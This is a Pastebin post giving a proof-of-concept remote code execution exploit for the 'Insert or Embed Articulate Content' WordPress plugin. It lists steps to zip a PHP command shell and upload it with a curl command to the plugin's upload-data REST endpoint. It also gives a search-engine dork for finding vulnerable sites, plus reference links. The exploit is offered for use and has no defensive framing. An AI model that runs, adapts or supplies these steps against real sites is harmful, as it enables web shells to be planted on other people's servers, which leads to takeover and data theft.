ToKeiChun

WP Plugin Insert Articulate Content into RCE

Sep 21st, 2019
218
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.71 KB | None | 0 0
  1. WordPress Plugin Insert or Embed Articulate Content into WordPress Remote Code Execution
  2.  
  3. POC :
  4.  
  5. [-] go to site/index.php/wp-json/articulate/v1/upload-data
  6. [-] input file index.html and index.php on zip file
  7. [-] u input blank on index.html and u input command shell on index.php
  8. [-] curl site/index.php/wp-json/articulate/v1/upload-data -F "name=urzip.zip" -F "chunk={RANDOM NUMBER}" -F "chunks={RANDOM NUMBER}" -F "file=@urzip.zip"
  9.  
  10. DORK :
  11. inurl:/wp-content/plugins/insert-or-embed-articulate/
  12.  
  13. SS:
  14. https://khunerable.net/images/70256562_129728355060689_1409106120445788160_n.jpg
  15.  
  16. REFERENCE :
  17. https://cxsecurity.com/issue/WLB-2019060137
  18. https://www.exploitkita.org/2019/06/wordpress-plugin-insert-or-embed.html
Add Comment
Please, Sign In to add comment